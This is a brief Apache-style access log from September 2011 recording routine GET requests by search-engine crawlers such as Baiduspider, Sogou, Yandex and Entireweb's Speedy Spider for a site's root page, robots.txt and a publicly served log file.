220.181.125.72 - - [05/Sep/2011:09:29:35 +0000] "GET / HTTP/1.1" 200 749 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
88.131.106.22 - - [05/Sep/2011:10:40:03 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.22 - - [05/Sep/2011:10:40:03 +0000] "GET /Account/access_log.txt HTTP/1.0" 200 248571 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
119.63.196.80 - - [05/Sep/2011:11:00:38 +0000] "GET /?C=D;O=D HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
119.63.196.120 - - [05/Sep/2011:11:38:37 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
180.76.5.189 - - [05/Sep/2011:11:47:58 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
95.108.158.245 - - [05/Sep/2011:11:52:26 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
